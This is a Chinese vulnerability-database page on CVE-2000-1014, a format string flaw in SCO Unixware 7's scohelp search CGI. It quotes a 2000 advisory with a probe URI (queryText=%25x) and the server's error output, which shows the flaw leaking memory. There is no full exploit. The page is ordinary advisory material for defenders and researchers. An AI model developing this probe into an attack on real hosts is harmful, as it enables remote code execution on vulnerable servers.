Unixware SCO help http server search97.cgi CGI命令执行漏洞

Unixware SCO help http server search97.cgi CGI命令执行漏洞

漏洞ID 1106013 漏洞类型 格式化字符串
发布时间 2000-09-26 更新时间 2005-05-02
图片[1]-Unixware SCO help http server search97.cgi CGI命令执行漏洞-安全小百科CVE编号 CVE-2000-1014
图片[2]-Unixware SCO help http server search97.cgi CGI命令执行漏洞-安全小百科CNNVD-ID CNNVD-200012-015
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20242
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-015
|漏洞详情
Unixware7的SCOhelphttpserver的search97.cgiCGI脚本存在格式化字符串漏洞。远程攻击者可以借助queryText参数中的格式化字符执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1717/info

SCO Unixware 7 default installation includes scohelp, an http server that listens on port 457/tcp and allows access to manual pages and other documentation files. The search CGI script provided for that purpose has a vulnerability that could allow any remote attacker to execute arbitrary code on the vulnerable machine with privileges of user "nobody". This poses a threat that could result in the remote compromise of the vulnerable host and provide a staging point from where an attacker could escalate privileges. 

There is a user supplied format string bug in the vtopic CGI script that could be abused to execute arbitrary code. By sending a request with the following URI:

http://target:457/search97cgi/vtopic?Action= FilterSearch&filter=&queryText=%25x

The server will elicit the following response:
--
Internal error: STR_sprintf: Invalid format (Error E1-0142 (Query
Builder): Invalid character '%' (0x25))

Result
Search failed: -40

Result
Error E1-0142 (Query Builder): Invalid character '

Result
Error E1-0130 (Query Builder): Syntax error in query string near
character 1

Result
Error E1-0133 (Query Builder): Error parsing query: 81888e0

Result
VdkSearchNew failed, error -40

Result
Request failed for REQUEST_METHOD=, QUERY_STRING=

Component
Component (vsearch) failed in processing request, -2

Action
Action (FilterSearch) failed while processing request in component
(vsearch), -2

Service Manager
Action (FilterSearch) failed in processing request, -2
S97IS Service manager failed to process request
--

Note that the line:
Error E1-0133 (Query Builder): Error parsing query: 81888e0

This shows that the server is interpreting the %x argument passed in the URI as the "queryText" value. Supplying a carefully built value for the queryText argument an attacker can change the program flow and execute arbitrary code.
|参考资料

来源:XF
名称:unixware-scohelp-format
链接:http://xforce.iss.net/static/5291.php
来源:BID
名称:1717
链接:http://www.securityfocus.com/bid/1717
来源:OSVDB
名称:3240
链接:http://www.osvdb.org/3240
来源:BUGTRAQ
名称:20000927UnixwareSCOhelphttpserverformatstringvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2000-09/0325.html

相关推荐: Common Unix Printing System Attribute Name Buffer Overflow Vulnerability

Common Unix Printing System Attribute Name Buffer Overflow Vulnerability 漏洞ID 1102371 漏洞类型 Boundary Condition Error 发布时间 2002-02-1…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享